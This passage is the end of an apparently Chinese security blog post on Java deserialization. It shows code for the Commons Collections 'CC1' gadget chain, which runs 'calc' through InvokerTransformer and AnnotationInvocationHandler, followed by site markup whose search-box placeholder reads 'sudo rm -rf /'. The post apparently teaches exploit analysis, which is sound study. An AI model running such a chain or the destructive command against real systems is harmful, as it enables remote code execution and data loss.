class="comment">//调用exec方法，弹出计算器</span></span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line">        <span class="comment">//创建实例</span></span><br><span class="line">        <span class="type">ChainedTransformer</span> <span class="variable">chainedTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);</span><br><span class="line">        HashMap&lt;Object, Object&gt; objectObjectHashMap = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;Object,Object&gt;();</span><br><span class="line">        objectObjectHashMap.put(<span class="string">&quot;value&quot;</span>,<span class="string">&quot;b&quot;</span>);</span><br><span class="line">        Map&lt;Object,Object&gt; TransformedMapDecorate = TransformedMap.decorate(objectObjectHashMap, <span class="literal">null</span>,chainedTransformer);</span><br><span class="line">        <span class="type">Class</span> <span class="variable">AnnotationInvocationHandler</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);<span class="comment">//获取类名</span></span><br><span class="line">        <span class="type">Constructor</span> <span class="variable">AnnotationInvocationHandlerConstructor</span> <span class="operator">=</span> AnnotationInvocationHandler.getDeclaredConstructor(Class.class, Map.class);<span class="comment">//获取构造器</span></span><br><span class="line">        AnnotationInvocationHandlerConstructor.setAccessible(<span class="literal">true</span>);<span class="comment">//设置可以访问</span></span><br><span class="line">        <span class="type">Object</span> <span class="variable">o</span> <span class="operator">=</span> AnnotationInvocationHandlerConstructor.newInstance(Target.class, TransformedMapDecorate);<span class="comment">//实例化</span></span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">&quot;cc1.bin&quot;</span>)).writeObject(o);</span><br><span class="line">        <span class="type">Object</span> <span class="variable">o1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(<span class="string">&quot;cc1.bin&quot;</span>)).readObject();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


  </article>
  <div id="paginator">
    
  
  </div>
<head>
    <script src='/js/Valine.min.js'></script>
  </head>
  <body>
    <div id="vcomments"></div>
    <script>
        new Valine({
            el: '#vcomments',
            appId: 'FLEvpheUdzYALN4BFt0PLJtV-gzGzoHsz',
            appKey: 'yhYts1vsbCivgo7vO1lVHyx9'
        })
    </script>
  </body>

  
                        </div>
                        <div class="col-md-4">
                          <div class="position-sticky">
  
    <div class="card">
      <form class="d-flex">
    <div class="input-container">
        <span class="bash-text" style="margin-bottom: 0 !important;">
            <span class="user">user</span><span class="vm">@abd</span>:<span class="char">~</span>$
        </span>
        <span>
            <input class="input" placeholder="sudo rm -rf /" type="text" id="local-search-input" required=""
            placeholder=" " aria-label="Search">
        </span>
        

    </div>
</form>
<div id="local-search-result"></div>
    </div>
    
      <div class="card">
        <div style="background-color: #0F172A;padding: 60px;text-align: center;"><img
            src="https://ebandeng.github.io/imgs/$%7Bfiilename%7D/logo.jpg" alt=""  style="border-radius: 100%;">
        </div>
        <div class="card-body">
          
            <h5 class="card-title">
              Hey!
            </h5>
            
          <p class="card-text">
            In the sea of coding, I am Lengux, pursuing creativity and user experience.
          </p>
          <p class="card-text"><small class="text-muted">
              
                <p id="hitokoto">
                  <script src="https://v1.hitokoto.cn/?encode=js&amp;select=%23hitokoto"></script>
                </p>
                
            </small></p>
        </div>
      </div>
      
        <div class="card cardtop">
          <div style="background-color: #0F172A;padding:0 10px;color: #fff;"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-people-fill" viewBox="0 0 16 16">
            <path d="M7 14s-1 0-1-1 1-4 5-4 5 3 5 4-1 1-1 1H7zm4-6a3 3 0 1 0 0-6 3 3 0 0 0 0 6z"/>
            <path fill-rule="evenodd" d="M5.216 14A2.238 2.238 0 0 1 5 13c0-1.355.68-2.75 1.936-3.72A6.325 6.325 0 0 0 5 9c-4 0-5 3-5 4s1 1 1 1h4.216z"/>
            <path d="M4.5 8a2.5 2.5 0 1 0 0-5 2.5 2.5 0 0 0 0 5z"/>
          </svg>&nbsp;友情链接</div>
          <div style="padding: 10px;">
            <div class="bottom-link">
        
            <a href=>
                <span>
                    
                </span>
            </a>
            
</div>
          </div>
        </div>
        
        
          <div class="card cardtop">
            <div style="background-color: #0F172A;padding:0 10px;color: #fff;"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-bookmarks" viewBox="0 0 16 16">
              <path d="M2 4a2 2 0 0 1 2-2h6a2 2 0 0 1 2 2v11.5a.5.5 0 0 1-.777.416L7 13.101l-4.223 2.815A.5.5 0 0 1 2 15.5V4zm2-1a1 1 0 0 0-1 1v10.566l3.723-2.482a.5.5 0 0 1 .554 0L11 14.566V4a1 1 0 0 0-1-1H4z"/>
              <path d="M4.268 1H12a1 1 0 0 1 1 1v11.768l.223.148A.5.5 0 0 0 14 13.5V2a2 2 0 0 0-2-2H6a2 2 0 0 0-1.732 1z"/>
            </svg>&nbsp;标签</div>
            <div style="padding: 10px;">
              
            </div>
          </div>
          
  
</div>




        
        
         
           
                        </div>
                      </div>
                     
                    </main>

                  </div>
                </div>
                <div id="bottom-outer">
  <div id="bottom-inner">
    Made with 💛 by
    <a href=https://github.com/XUSHAO11/lengux.git style="color:#0d6efd"> Lengux </a>
    and some fantastic contributors! <a target="_blank" rel="noopener" href="http://hexo.io" style="color:#0d6efd">hexo blog framework</a>
    <div><a target="_blank" rel="noopener" href="https://beian.miit.gov.cn/" style="color:#0d6efd">豫ICP备2022014432号-1</a></div>
  </div>
</div>

  <!-- Highlight.js -->
  <link rel="stylesheet" href="/css/github.min.css">
  <script src="/js/highlight.min.js">
  </script>
  <script>
    hljs.initHighlightingOnLoad();
  </script>
  
                  
<svg id="toptop" xmlns="http://www.w3.org/2000/svg" width="30" height="30" fill="currentColor" class="bi bi-arrow-up-square" viewBox="0 0 16 16">
  <path fill-rule="evenodd" d="M15 2a1 1 0 0 0-1-1H2a1 1 0 0 0-1 1v12a1 1 0 0 0 1 1h12a1 1 0 0 0 1-1V2zM0 2a2 2 0 0 1 2-2h12a2 2 0 0 1 2 2v12a2 2 0 0 1-2 2H2a2 2 0 0 1-2-2V2zm8.5 9.5a.5.5 0 0 1-1 0V5.707L5.354 7.854a.5.5 0 1 1-.708-.708l3-3a.5.5 0 0 1 .708 0l3 3a.5.5 0 0 1-.708.708L8.5 5.707V11.5z"/>
</svg>
<style>
</style>

        </body>
        
          
            <script src="/js/bootstrap.bundle.min.js"></script>
            
            <script src="/js/jquery-2.0.2.min.js"></script>
            
            <script src="/js/lengux.js"></script>
            
            <script src="/js/dark.js"></script>
            
            <script src="/js/search.js"></script>
            
            <script src="/js/darkmode-js.min.js"></script>
            
              

</html>

<script src="/js/search.js"></script>

  <script type="text/javascript">
    var search_path = "search.xml";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    searchFunc(path, 'local-search-input', 'local-search-result');
  </script>
